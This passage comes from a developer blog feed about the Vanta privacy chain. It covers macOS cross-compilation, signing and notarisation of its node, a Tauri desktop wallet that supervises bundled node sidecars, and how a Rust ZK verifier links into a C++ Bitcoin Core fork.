Solana is also the only general-purpose Turing-complete L1 that has shipped pairing-friendly elliptic-curve precompiles to the validator runtime. Ethereum has had the `EIP-197` pairing precompile since the Byzantium fork (2017), but the gas costs make Groth16 verification on Ethereum L1 cost ~$5 per proof at typical gas prices. Solana's per-CU pricing brings that down by ~400×.
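A quick sanity check on the compute numbers quoted in this list, and on the $n \leq 7$ batch bound from the fee-amortisation discussion. Assuming ~200K CU per Groth16 verification and the ~1.4M CU per-transaction ceiling (the real accounting includes more than verification cost, so treat these as ceilings, not measurements):

```rust
// Back-of-the-envelope CU budgets. Both constants come from the posts;
// the arithmetic is the only thing this sketch adds.
const GROTH16_VERIFY_CU: u64 = 200_000;
const TX_CU_LIMIT: u64 = 1_400_000;

// Verifying n proofs independently costs n * 200K CU, so at most 7 fit
// in one transaction — the n <= 7 figure.
fn max_verifications_per_tx() -> u64 {
    TX_CU_LIMIT / GROTH16_VERIFY_CU
}

// With a folded batch proof, one verification covers the whole batch,
// so the amortised per-transaction cost is verify_cost / n.
fn amortised_cu(batch: u64) -> u64 {
    GROTH16_VERIFY_CU / batch
}

fn main() {
    assert_eq!(max_verifications_per_tx(), 7);
    assert_eq!(amortised_cu(7), 28_571); // ~7x cheaper per transaction
}
```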
## What's coming in the series

| # | Slug | What it covers |
|---|------|----------------|
| 2 | [`the_fee_paradox`](/blog/the_fee_paradox/) | Why every smart-contract privacy protocol needs a relayer (or doesn't) |
| 3 | [`spst_self_paying_shielded_transactions`](/blog/spst_self_paying_shielded_transactions/) | SPST construction, balance theorem, double-spend resistance, unlinkability proof |
| 4 | [`ppst_private_programmable_state`](/blog/ppst_private_programmable_state/) | Generalising SPST to arbitrary computation; PPST relation; PPST-SPST composition |
| 5 | [`tab_threshold_anonymous_broadcast`](/blog/tab_threshold_anonymous_broadcast/) | Ring signatures over Ed25519 + FROST threshold Schnorr |
| 6 | [`verifiable_shuffles_for_privacy`](/blog/verifiable_shuffles_for_privacy/) | Bayer-Groth shuffles for network-layer mixing |
| 7 | [`upee_universal_private_execution`](/blog/upee_universal_private_execution/) | UPEE deploy / invoke / verify; the simulation-based privacy theorem |
| 8 | [`solana_instantiation_656_bytes`](/blog/solana_instantiation_656_bytes/) | Concrete Solana instantiation with CU + transaction-byte budgets |
| 9 | [`f_rp_vs_existing_privacy_systems`](/blog/f_rp_vs_existing_privacy_systems/) | F_RP vs Zcash, Tornado, Railgun, Aztec, Penumbra, Aleo, Namada, Monero |
| 10 | [`mev_resistance_in_private_execution`](/blog/mev_resistance_in_private_execution/) | Sandwich-proofness; bounding MEV by public-bit leakage |
| 11 | [`post_quantum_relayerless_path`](/blog/post_quantum_relayerless_path/) | Lattice commitments, STARK wrapping, isogeny credentials |

## Bibliography for this post

- Aylor, H. (2026). *Relayerless Full-Privacy Framework for Turing-Complete Blockchain Systems.* Preprint, Zera Labs. (The paper this series is derived from. Final PDF will land at `/papers/relayerless-privacy/` once typeset.)
- Ben-Sasson, E. et al. (2014). *Zerocash: Decentralized Anonymous Payments from Bitcoin.* IEEE S&P 2014.
- Hopwood, D. et al. (2016–2026).
*Zcash Protocol Specification.* https://zips.z.cash/protocol/protocol.pdf
- Pertsev, A., Semenov, R., Storm, R. (2019). *Tornado Cash Privacy Solution v1.4.*
- Mayer Brown (2024). *Federal Appeals Court Tosses OFAC Sanctions on Tornado Cash.*

Next post: [The fee paradox →](/blog/the_fee_paradox/)

---

# Cross-compiling vantad for darwin: Apple Silicon, sign + notarise

Canonical: https://blog.skill-issue.dev/blog/vanta_darwin_apple_silicon_build/
Description: Shipping vantad as a notarised Mac binary inside a Tauri app meant fixing libconsensus link order, building Rust release with the right target triple, signing every sidecar, and stapling the DMG separately. The notes from the trenches.
Published: 2026-04-13T18:25:14.000Z
Tags: vanta, darwin, macos, apple-silicon, tauri, codesign

The 2026-04-13 commit `eff33f7a chain+build: mined genesis nonce + libconsensus links FFI` and the 2026-04-23 commit `0edddc82 build: darwin frameworks, wallet-ui node types, v2 test renames` are the bookends of the macOS build story. In between is a week of "why does my dylib not load" and "why does Gatekeeper not trust this DMG even though everything inside it is signed." This post is the field notes from cross-compiling `vantad` for darwin-aarch64, signing everything that needs signing, notarising what needs notarising, and stapling the DMG so users don't see "this came from the internet" prompts. Everything I describe is in [`vanta-desktop/build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh) and the [`doc/build-osx.md`](https://github.com/Dax911/vanta/blob/main/doc/build-osx.md) it leans on. The goal is that an engineer doing their first ARM Mac build doesn't have to repeat my mistakes.
## What you actually have to ship

A Vanta desktop install on macOS contains three sidecar binaries inside one signed `.app`:

- `vantad-aarch64-apple-darwin` — the C++ Bitcoin Core fork
- `vanta-cli-aarch64-apple-darwin` — the matching CLI
- `vanta-node-aarch64-apple-darwin` — the Rust L2 sidecar

Plus the Tauri host binary (`Vanta Wallet`) and the WebView assets. All of this rides inside a `.dmg` that itself has to be notarised separately. There's a sentence I'm going to repeat because it tripped me twice: **on macOS, Tauri 2.x notarises the `.app`, not the `.dmg` that wraps it.** Gatekeeper checks the file the user *downloaded*, which is the DMG. So you have to submit the DMG to `notarytool` separately and staple the resulting ticket. This is documented in approximately zero places. I figured it out by attempting to install my own DMG on a clean VM and watching Gatekeeper refuse it with a generic error.

## The build sequence

The release script does seven steps. I'll narrate them.

**Step 1: build `vantad`.** This is the C++ Bitcoin Core fork's autotools build:

```bash
./autogen.sh
./configure --without-gui --disable-tests --disable-bench \
  --without-bdb --without-miniupnpc --without-natpmp
make -j$(sysctl -n hw.ncpu)
```

The `--without-bdb --without-miniupnpc --without-natpmp` flags are the canonical "don't pull in dependencies the wallet doesn't need" set. BerkeleyDB only matters for legacy wallets, miniupnpc is for UPnP NAT traversal, natpmp is the same on Apple's stack. Skipping them shaves 30+ MB and a bunch of failure modes off the binary. `--without-gui` is because we're not shipping `vanta-qt`. The Qt UI is *also* possible to ship — the upstream Bitcoin Core team supports it — but on Vanta the desktop wallet *is* the Tauri app, and the C++ binary is just a sidecar. No need for two UIs.

**Step 2: build `vanta-node`.**

```bash
cd vanta && cargo build --release -p vanta-node
```

Cargo handles the cross-compile to whatever the host target is.
On an Apple Silicon Mac that produces the `aarch64-apple-darwin` binary you want. On Intel Macs you'd get `x86_64-apple-darwin`; the Tauri sidecar resolution in [`node.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs) handles both. The `target_triple()` helper in `node.rs` makes the runtime resolution honest:

```rust
pub fn target_triple() -> &'static str {
    if cfg!(target_os = "macos") {
        if cfg!(target_arch = "aarch64") {
            "aarch64-apple-darwin"
        } else {
            "x86_64-apple-darwin"
        }
    } else if cfg!(target_os = "linux") {
        "x86_64-unknown-linux-gnu"
    } else {
        "x86_64-pc-windows-msvc"
    }
}
```

The host binary discovers its sidecars by appending the target-triple suffix. This is also how Tauri itself decides which file to bundle — `tauri.conf.json` declares `"binaries/vantad"` and the bundler looks for `vantad-aarch64-apple-darwin` next to the conf.

**Step 3: copy the sidecars.**

```bash
cp "$REPO_ROOT/src/bitcoind" "$BINDIR/vantad-$TRIPLE"
cp "$REPO_ROOT/src/bitcoin-cli" "$BINDIR/vanta-cli-$TRIPLE"
cp "$REPO_ROOT/vanta/target/release/vanta-node" "$BINDIR/vanta-node-$TRIPLE"
```

The C++ binary is still called `bitcoind` after the upstream fork (we haven't renamed the actual file in `src/` because that breaks too much of the upstream build); we rename it during the copy.

**Step 4: install frontend deps.** `pnpm install`. The Vite/Tauri build needs the React app's deps for the bundler.

**Step 5: build the Tauri app.** `pnpm tauri build`.
Tauri auto-signs the `.app` (and every binary inside it) with the Developer ID identity declared in [`tauri.conf.json`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/tauri.conf.json):

```json
"macOS": {
  "signingIdentity": "474F624D8F3783B4D607CFF2331AD4C6CC26A1B5",
  "providerShortName": "9HD4Q82U58",
  "entitlements": "entitlements.plist",
  "minimumSystemVersion": "10.15"
}
```

Tauri also auto-notarises the `.app` if `APPLE_ID`, `APPLE_PASSWORD`, and `APPLE_TEAM_ID` are set in the environment. The release script reads them from `.env.local`. If they're missing the script prints a warning and proceeds without notarisation — useful for local dev builds.

**Step 6: notarise the DMG separately.**

```bash
xcrun notarytool submit "$DMG_PATH" \
  --apple-id "$APPLE_ID" \
  --password "$APPLE_PASSWORD" \
  --team-id "$APPLE_TEAM_ID" \
  --wait
xcrun stapler staple "$DMG_PATH"
```

This is the step I had to discover. `notarytool submit` uploads the DMG, Apple's notary service runs its scan, and `stapler staple` attaches the resulting ticket to the file so Gatekeeper can verify offline.

**Step 7: verify everything.**

```bash
codesign --verify --deep --strict --verbose=2 "$APP_PATH"
spctl -a -t open --context context:primary-signature -v "$DMG_PATH"
xcrun stapler validate "$APP_PATH"
xcrun stapler validate "$DMG_PATH"
```

If any of these fail I want to know *before* the DMG ships, not after a user tries to install it. The verification is fast — under a second on a recent Mac — so it's free to run as a final step.

## The libconsensus link order issue

The 2026-04-13 commit `eff33f7a chain+build: mined genesis nonce + libconsensus links FFI` was the fix for a problem that took an embarrassing amount of time. The C++ build's link order didn't include the FFI verifier static library (`libvanta_verifier.a`) before the Bitcoin libconsensus shared library, with the result that consensus-time calls to `vanta_verify_and_decode` came back as undefined symbols at runtime.
The fix was a `Makefile.am` patch making the linker order explicit:

```
src_bitcoind_LDADD = libvanta_verifier.a $(LIBBITCOIN_CONSENSUS) ...
```

The lesson: when you're FFI-binding a Rust static lib into a C++ autotools project, `LDADD` order is load-bearing. The static lib has to come *before* the shared lib that depends on it, or the linker won't resolve symbols. This is one of those things autotools makes more painful than it should be; in CMake you'd never trip on it.

## The `share/pixmaps` straggler

A bunch of the macOS-build pain wasn't actual build pain; it was rebrand pain. The Bitcoin Core stock build copies icons from `share/pixmaps/bitcoin*.{png,xpm,ico}` into the bundle. Those files still showed Bitcoin's logo even after the chain rebrand, because the icon files weren't `git mv`'d during the zera→vanta rebrand. From [`CLAUDE.md`](https://github.com/Dax911/vanta/blob/main/CLAUDE.md):

> Bitcoin Core stock icons in `share/pixmaps/bitcoin*.{png,xpm,ico}` still show Bitcoin logo; `src/qt/res/` Qt resources also unrebranded. Qt wallet rebrand is secondary.

We don't ship `vanta-qt`, so this is a cosmetic-only issue, but it's the kind of thing an external auditor will flag, and rightly so. **TODO: Dax confirm we ship the icon rename in the next pass.**

## Why ship a Mac binary at all

A reasonable challenge: if Vanta is meant to be operator-driven and most operators run Linux servers, why spend this much effort on Mac packaging? The answer is that *desktop* runs on Mac. Servers run Linux; that's the `vantad` people deploy with systemd. But the wallet — the thing a person actually opens to send a transaction — needs to feel native on the platform the user has. In 2026 that's Mac for half my user base, Linux for the other half (with a long tail of Windows, which we ship via the `bd7d6299` MSI build). A privacy-chain wallet that only works on Linux is a wallet that's only used by people who already agree with you. The Mac story is the bridge to *normal users*.
## What I would do differently

1. **Codesign-by-default in the Rust build.** I have my Apple Developer creds in `.env.local` and the release script reads them. If I'm doing a quick dev build I sometimes forget to enable signing, and then the resulting binary won't load on a fresh macOS sandbox. Default-on signing for any release build, opt-out for dev builds, would be safer.
2. **Universal binary instead of two builds.** Right now I build aarch64 and x86_64 separately and ship two DMGs. `lipo` can produce a universal binary that runs on both. Tauri 2.x supports it. On the list.
3. **Reproducible builds.** Bitcoin Core has a [Guix-based reproducible build setup](https://github.com/Dax911/vanta/blob/main/doc/guix.md) that produces byte-identical binaries on any host with the right toolchain. I haven't ported that to the Vanta build because it'd require pulling vanta-node into the Guix manifest. Important for downstream trust; not blocking for a first release.

## Further reading

- [`vanta-desktop/build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh) — the script this post narrates
- [`vanta-desktop/src-tauri/tauri.conf.json`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/tauri.conf.json) — the bundle config
- [`doc/build-osx.md`](https://github.com/Dax911/vanta/blob/main/doc/build-osx.md) — the upstream Bitcoin Core macOS build doc
- [`doc/guix.md`](https://github.com/Dax911/vanta/blob/main/doc/guix.md) — the reproducible-build path I haven't taken yet
- [Vanta Desktop: a Tauri wallet that ships its own full node](/blog/vanta_desktop_tauri_wallet/) — the app this build produces
- [Apple's notarytool docs](https://developer.apple.com/documentation/security/notarizing-macos-software-before-distribution) — the notarisation contract

---

# Vanta Desktop: a Tauri wallet that ships its own full node

Canonical: https://blog.skill-issue.dev/blog/vanta_desktop_tauri_wallet/
Description: Most desktop wallets are
thin RPC clients that talk to somebody else's node. The Vanta desktop app spawns vantad and the L2 sidecar as Tauri sidecar binaries, owns their PIDs, and adopts orphans on restart. Here is how that came together.
Published: 2026-04-13T21:39:27.000Z
Tags: vanta, tauri, rust, desktop, wallet, sidecar

The user-facing pitch for Vanta is short: open the wallet, click send, watch a private transaction settle on a chain you can verify yourself. The version of that pitch that's actually true requires three processes: a C++ Bitcoin Core fork (`vantad`), a Rust L2 sidecar (`vanta-node`), and a UI. Most "desktop wallets" in 2026 ship the UI and trust someone else for the other two. We didn't want to ship a wallet like that, and the answer turned out to be Tauri.

This post is a tour of [`vanta/vanta-desktop`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-desktop) — the Tauri 2.x app that bundles `vantad` and `vanta-node` as sidecars, runs them under PID supervision in a Rust host, and exposes the resulting capability to a React frontend through `#[tauri::command]` IPC. Sister reads: [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) is the chain itself, and [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) is the deeper dive on the L2 daemon.

## Why Tauri at all

I spent an unreasonable number of hours on this question. The candidates were Electron, Tauri, native (Swift / Cocoa for Mac, GTK or Qt elsewhere), and a Wails-style Go-with-WebView setup. The constraints:

1. The wallet has to ship a **full node binary**. Not link to it — *ship* it as an external file inside the app bundle. That binary is ~25 MB on macOS aarch64.
2. The node has to **run as a child process** of the app, with the app owning its PID and capable of cleanup on quit.
3. The UI is React because the [web wallet UI](https://github.com/Dax911/vanta/tree/main/wallet-ui) already existed and I wasn't rewriting it.
4.
The signing path uses Apple's Developer ID program. The bundle has to be signed and notarised, including the sidecars.

Electron was out: the bundle bloat (Chromium, ~300 MB) plus the historical Electron-IPC-as-XSS attack surface is a non-starter for a wallet. Native Mac was out because we ship Linux too. Wails was tempting, but its sidecar story for non-Go binaries is awkward. Tauri 2.x ticked every box: small bundle (the WebView is OS-provided), sidecars are first-class via the [`externalBin` field](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/tauri.conf.json), the IPC contract is generated from `#[tauri::command]` Rust functions, and the host process is a normal Rust program where I can do `std::process::Command::new(...)` exactly the way I would in any CLI.

The `tauri.conf.json` declares the sidecars verbatim:

```json
"externalBin": [
  "binaries/vantad",
  "binaries/vanta-node",
  "binaries/vanta-cli"
]
```

Tauri's bundler will copy `binaries/vantad-aarch64-apple-darwin` (note the target-triple suffix it requires) into the `.app`'s `Contents/MacOS/` directory and code-sign it with the same identity as the host binary. From the Rust side I get a path I can spawn against. Done.

## The sidecar inventory

There are three sidecar binaries and they have different jobs.

`vantad` is the C++ Bitcoin Core fork. It's the consensus node — it runs the SHA-256 PoW mainnet, validates blocks, holds the L1 UTXO set, exposes JSON-RPC on a port. From the desktop app's point of view it is the ground truth for "what does the chain say."

`vanta-node` is the Rust L2 sidecar. It indexes commitments and nullifiers from L1 OP_RETURN anchors, maintains the SMT, and exposes a REST API. The shielded balance, the SMT root, the nullifier set — that's all here. The desktop app talks to it on a separate port.

`vanta-cli` is the C++ command-line client. It's there for power users and debugging.
The wallet doesn't shell out to it for anything load-bearing, but it's bundled because if you have `vantad` you almost always want `vanta-cli` too.

The sidecar build script is short and readable — [`setup-sidecars.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/setup-sidecars.sh) just searches well-known paths, copies the binaries into `src-tauri/binaries/`, and renames them with the target-triple suffix Tauri's bundler expects. The release pipeline ([`build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh)) builds `vantad` and `vanta-node` from source first, then runs `pnpm tauri build`, then notarises the resulting `.dmg` separately because Tauri 2.x notarises the `.app` but not the DMG wrapper.

## The PID supervisor

Once you've decided to ship a binary, you've inherited a job: babysit its process. The supervisor lives in [`src-tauri/src/node.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/node.rs) and the centerpiece is the `NodeManager` struct.

```rust
// The Option payload types below are reconstructed (they were lost in
// transcription); see node.rs for the exact definitions.
pub struct NodeManager {
    l1_process: Option<Child>,
    l2_process: Option<Child>,
    l1_adopted: bool,
    l2_adopted: bool,
    l1_bin: Option<PathBuf>,
    l2_bin: Option<PathBuf>,
    pub l1_logs: LogBuffer,
    pub l2_logs: LogBuffer,
    app_handle: Option<AppHandle>,
}
```

A few things in here took longer than they should have to get right.

**Adoption.** The desktop app uses dedicated ports — `19332` for L1 RPC, `19333` for P2P, `19380` for the L2 API — so it never collides with a standalone `vantad` running elsewhere on the same machine. But it *does* collide with itself if a previous run died ungracefully. So `start_l1` first probes the port: if something is listening *and* it answers `getblockchaininfo` correctly, we adopt it (return PID 0 as a sentinel). If something is listening but not responsive, we kill the orphan with `lsof -ti :PORT | xargs kill` and respawn. If the port is free, we spawn fresh. This logic is not optional.
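The adopt-or-kill decision can be sketched as a small state table. This is a simplification of what the post describes, not the real `NodeManager` code: the actual implementation probes via a `getblockchaininfo` RPC call, while here the probe results are just booleans, and `port_listening` is a plain TCP connect I added for illustration.

```rust
use std::net::{SocketAddr, TcpStream};
use std::time::Duration;

// The three outcomes of probing the dedicated L1 port on startup.
#[derive(Debug, PartialEq)]
enum PortPlan {
    Adopt,      // listening and answers RPC: reuse it (PID 0 sentinel)
    KillOrphan, // listening but unresponsive: kill and respawn
    SpawnFresh, // port free: normal startup
}

fn plan(listening: bool, rpc_ok: bool) -> PortPlan {
    match (listening, rpc_ok) {
        (true, true) => PortPlan::Adopt,
        (true, false) => PortPlan::KillOrphan,
        (false, _) => PortPlan::SpawnFresh,
    }
}

// Crude liveness probe: can we open a TCP connection to localhost:port?
fn port_listening(port: u16) -> bool {
    let addr: SocketAddr = ([127, 0, 0, 1], port).into();
    TcpStream::connect_timeout(&addr, Duration::from_millis(200)).is_ok()
}

fn main() {
    // 19332 is the desktop L1 RPC port from the post.
    let listening = port_listening(19332);
    println!("probe says listening={listening}, plan={:?}", plan(listening, false));
    assert_eq!(plan(false, false), PortPlan::SpawnFresh);
    assert_eq!(plan(true, true), PortPlan::Adopt);
}
```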
The first version of this code didn't have it, and every quit-and-relaunch produced a "port in use, vantad failed to start" error that confused absolutely everybody.

**Pipe draining.** A C++ process logging to stdout will eventually fill the OS's 64 KB pipe buffer if nobody reads it, then block on the next `write()`. `vantad` with `-printtoconsole` is a heavy logger. The host has to drain the pipes constantly. The function that does it is small enough to quote whole:

```rust
// Generic bounds and the AppHandle type parameter are reconstructed
// (lost in transcription); see node.rs for the exact signature.
fn drain_pipe<R: Read + Send + 'static>(
    pipe: R,
    label: &'static str,
    log_buf: LogBuffer,
    event_emitter: Option<AppHandle>,
) {
    std::thread::spawn(move || {
        let reader = std::io::BufReader::new(pipe);
        for line in reader.lines() {
            match line {
                Ok(text) => {
                    tracing::debug!("[{label}] {text}");
                    log_buf.push(text.clone());
                    if let Some(ref app) = event_emitter {
                        let _ = app.emit("node-log", serde_json::json!({
                            "source": label,
                            "line": text,
                        }));
                    }
                }
                Err(e) => {
                    tracing::debug!("[{label}] pipe read error: {e}");
                    break;
                }
            }
        }
    });
}
```

Each line goes three places: the Rust tracing log, a 200-line ring buffer that the frontend can pull on demand (`status` returns the last 20), and a Tauri event so the frontend can render a live console. This last one is the thing that turned a black-box "is the node alive" indicator into a full-screen log view that's actually useful for debugging failures.

**Auto-config.** Before `vantad` starts, the host writes a fresh `vanta.conf` into the desktop-isolated data dir at `{home}/.vanta-desktop/l1/vanta.conf`. The config is hardcoded for the desktop's port plan, points at the seed nodes, sets `txindex=1` so the L2 watcher can find historic OP_RETURN anchors, and disables Bitcoin-style DNS seeding (we're not on Bitcoin's network). The user never sees this file unless they go looking.

## Sequenced startup

The first wallet release would just spawn both nodes and hope. The result was a race condition: `vanta-node` would come up before `vantad`'s RPC was reachable, fail its first poll, and die.
We added [`sequenced_startup`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/lib.rs) so the L2 only starts after the L1's RPC has actually answered.

```
Stage 1: Start L1 (may adopt)
Stage 2: Wait for L1 RPC up to 60s, exponential backoff
Stage 3: Create / load default wallet via RPC
Stage 4: Start L2 (now that L1 is confirmed reachable)
Stage 5: Emit "ready" event to frontend
```

Each stage emits a Tauri event the frontend subscribes to. The first-launch UX is a five-stage progress meter that goes "spawning vantad… RPC ready… wallet loaded… spawning vanta-node… ready." On a warm cache that whole flow takes about 4 seconds. On a cold first launch it's closer to 12. Better than 12 silent seconds with a spinner.

If anything fails, the failure stage gets the last 15 lines of stdout/stderr appended into the error message. The user sees not "vantad failed" but "vantad exited during startup. Last output: …". That diagnostic surface alone has paid for itself ten times over in support tickets I didn't have to chase.

## The IPC contract

The frontend never speaks JSON-RPC to `vantad` directly. Every UI action goes through a `#[tauri::command]` defined in [`commands.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/commands.rs). The `lib.rs` registration is a single `invoke_handler` macro:

```rust
.invoke_handler(tauri::generate_handler![
    commands::wallet_init,
    commands::wallet_info,
    commands::wallet_balance,
    commands::wallet_notes,
    commands::wallet_send,
    commands::wallet_sync,
    commands::wallet_pubkey,
    commands::rpc_call,
    commands::start_nodes,
    commands::node_start_l1,
    commands::node_start_l2,
    commands::node_stop_l1,
    commands::node_stop_l2,
    commands::node_status,
    commands::l2_status,
    commands::swap_initiate,
    commands::swap_participate,
    commands::swap_list,
    commands::swap_inspect,
    commands::get_settings,
    commands::set_settings,
])
```

Every command is a typed Rust function that Tauri generates a TypeScript stub for.
The frontend imports `invoke('wallet_balance')` and gets back a typed JSON response. There's no HTTP server inside the app, no `localhost:8085`, no possibility of a malicious website hitting the wallet's API. This is a privacy property as well as a security one. A web wallet that runs on `localhost:8085` is reachable by any browser tab. A Tauri wallet that uses the IPC bridge isn't. The wallet's `csp` is `null` in `tauri.conf.json` only because the frontend doesn't load anything cross-origin — every "fetch" is actually an `invoke`. ## Linux/NVIDIA, the cursed stanza Two lines in [`lib.rs`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/src-tauri/src/lib.rs) earned a comment longer than they are: ```rust #[cfg(target_os = "linux")] { if std::env::var("WEBKIT_DISABLE_DMABUF_RENDERER").is_err() { std::env::set_var("WEBKIT_DISABLE_DMABUF_RENDERER", "1"); } } ``` webkit2gtk on NVIDIA's proprietary driver under Wayland tries to use a DMA-BUF renderer path that crashes with "Error 71 (Protocol error) dispatching to Wayland display." Disabling it forces software compositing, which is fine. This one bug ate a weekend before the workaround landed. The wider lesson: when you ship a desktop app you become a desktop developer, and "desktop developer" means "the OS will surprise you in ways the web never has." Budget for it. ## macOS sign + notarise Apple's developer pipeline for distributing an app outside the Mac App Store is its own genre of misery, but it's a solved misery. The [`build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh) script automates the whole thing: 1. Build `vantad` (C++) and `vanta-node` (Rust release) from source. 2. Copy them into `src-tauri/binaries/` with target-triple suffixes. 3. Load `APPLE_ID` / `APPLE_PASSWORD` / `APPLE_TEAM_ID` from `.env.local`. 4. Run `pnpm tauri build`. 
Tauri auto-signs the `.app` with the Developer ID identity declared in `tauri.conf.json` (`Developer ID Application: Hayden Porter-Aylor (9HD4Q82U58)`). 5. Submit the `.dmg` separately to `xcrun notarytool`. 6. Staple the resulting ticket with `xcrun stapler staple`. 7. Verify everything with `codesign --verify --deep --strict --verbose=2` and `spctl -a -t open -v`. The reason step 5 exists at all is that Tauri 2.x notarises the `.app` but not the `.dmg` that wraps it. Gatekeeper checks the outer file when a user downloads the DMG, so we have to submit the wrapper separately. This is documented in approximately zero places. I figured it out by attempting to install my own DMG on a clean VM and watching Gatekeeper refuse it. Two hours of head-scratching later, the staple step landed. The end state: a user downloads `Vanta Wallet.dmg`, double-clicks it, drags the app to Applications, and Gatekeeper signs off without a "this came from the internet" prompt. That's the outcome that matters — and it would not be possible without the Tauri sidecar pattern signing the inner binaries with the same identity. ## What I changed my mind about I started the desktop project genuinely planning to ship the existing `wallet-ui` as a webpage and tell people to run a `vantad` themselves. The friction of that — every user a node operator on day one — was always going to be a non-starter for everybody but engineers like me. The desktop app is the answer to "I want my mom to be able to use this," and Tauri's sidecar feature is what made the answer cheap enough to ship. If you're building a wallet for a privacy chain in 2026 and you skip the embedded full-node story, you are shipping an indexed light client and calling it a wallet. That's fine for some products. It is not fine for this one. The whole pitch of Vanta is *you don't have to trust an indexer.* If the wallet trusts an indexer the pitch evaporates. 
## TODO: Dax confirm - The signing identity hash `474F624D8F3783B4D607CFF2331AD4C6CC26A1B5` and team ID `9HD4Q82U58` are real Apple Developer values. They're committed to the repo because the cert itself is private and the public values aren't sensitive — but worth a sanity check before publishing a wider distribution. - Windows MSI build was added in [commit `bd7d6299`](https://github.com/Dax911/vanta/commit/bd7d6299) on 2026-04-14. I'm describing the macOS-canonical pipeline because it's the one I run end-to-end; the Windows path may have evolved since I last touched it. ## Further reading - [`vanta-desktop/src-tauri`](https://github.com/Dax911/vanta/tree/main/vanta/vanta-desktop/src-tauri) — the Tauri host, including the node supervisor - [`vanta-desktop/build-release.sh`](https://github.com/Dax911/vanta/blob/main/vanta/vanta-desktop/build-release.sh) — sign + notarise + verify pipeline - [The vanta sidecar architecture](/blog/vanta_sidecar_architecture/) — what `vanta-node` is doing on the other side of these IPC calls - [Vanta: a Bitcoin fork with ZK at consensus](/blog/vanta_zk_privacy_l1/) — what's running inside `vantad` - [Tauri 2.x docs on sidecars](https://tauri.app/v2/develop/sidecar/) — the framework feature this is all built on - [Apple's notarytool docs](https://developer.apple.com/documentation/security/notarizing-macos-software-before-distribution) — the macOS distribution pipeline --- # The vanta sidecar: how a Rust ZK indexer talks to a C++ Bitcoin node Canonical: https://blog.skill-issue.dev/blog/vanta_sidecar_architecture/ Description: vantad is C++. The ZK index is Rust. They cooperate over RPC and a REST API, with the C++ verifier linked statically through libvanta_verifier.a. Here is the audit-surface trade we made and what the sidecar actually does. 
Published: 2026-04-13T17:46:02.000Z Tags: vanta, rust, sidecar, sp1, zk, bitcoin, ffi A 1-minute-block Bitcoin Core fork with ZK proofs at consensus has a problem the README doesn't volunteer: you need the validator to *check the proofs*, but you don't want to write the proof system in C++. Vanta's answer is a hybrid. The C++ consensus engine calls a Rust verifier statically linked as `libvanta_verifier.a`. The L2 indexing, the SMT, the encrypted-note delivery, and the proof-generation hot path all live in a *separate* Rust process — `vanta-node` — that talks to `vantad` over JSON-RPC and to wallets over REST. Two things share the name "sidecar" in this codebase and I want to disambiguate them up front: 1. The **FFI verifier** (`vanta-verifier-ffi` → `libvanta_verifier.a`) is *linked into vantad*. It runs in-process. It's what answers "does this SP1 proof verify" inside `src/script/interpreter.cpp`. 2. The **L2 sidecar** (`vanta-node`) is a *separate daemon*. It indexes commitments, holds the SMT, distributes encrypted notes, and serves a REST API to wallets. It does not participate in consensus. This post is about both, because the architecture only makes sense when you see why one is in-process and the other isn't. ## The audit-surface trade Bitcoin Core has 280k+ lines of C++ that have been read by more eyes than any other consensus codebase on Earth. Adding a Rust dependency to that build is a non-trivial ask of a future Bitcoin-Core-style review. We made the call up-front: a *minimal* Rust footprint inside `vantad`, exposed through a hand-written C ABI, with everything else in a separate process. The minimal footprint is `libvanta_verifier.a`. 
From the [zkVM engineering paper](https://github.com/Dax911/vanta/blob/main/papers/17-zkvm-engineering.md), the contract: > The bridge between the ZK proof world and the consensus world is a 440-byte C-compatible structure called `VantaJournal`, declared in `src/vanta/verifier.h`: > > ```c > typedef struct { > uint8_t smt_root[32]; > uint32_t input_commitment_count; > uint8_t input_commitments[VANTA_MAX_SLOTS][32]; > uint32_t nullifier_count; > uint8_t nullifiers[VANTA_MAX_SLOTS][32]; > uint32_t commitment_count; > uint8_t commitments[VANTA_MAX_SLOTS][32]; > int64_t value_balance; > } VantaJournal; > ``` The C++ never deserializes an SP1 proof. It calls `vanta_verify_and_decode()` with a byte slice; the function returns a boolean and populates the `VantaJournal`. From there the consensus engine looks at 32-byte hashes and a signed `i64` and makes its decisions on bytes alone. This is a deliberate cryptographic-engineering posture. The proof system can change underneath the FFI without changing the FFI. SP1 today, Halo 2 someday, whatever-comes-after-that the day after that — the C++ doesn't have to know. ## Why isn't the L2 logic in `vantad` too? This was the design conversation that took the longest to resolve. Option A was to put everything in-process. One binary, one supervised PID, fewer moving parts. The problem: the L2 index isn't *consensus*. It's an indexed view of commitments, an SMT, and a REST API. Bundling that into `vantad` would mean every Bitcoin-Core-style operator who wanted to run the chain would inherit an HTTP server, an SQLite-backed index, and an iroh-based gossip layer. That's a footprint expansion that buys nothing for the consensus path. Option B was a separate process with a clean network boundary. `vanta-node` talks *down* to `vantad` over standard JSON-RPC (the same `getblock`/`getrawtransaction` an explorer would use) and *up* to wallets over REST and iroh gossip. 
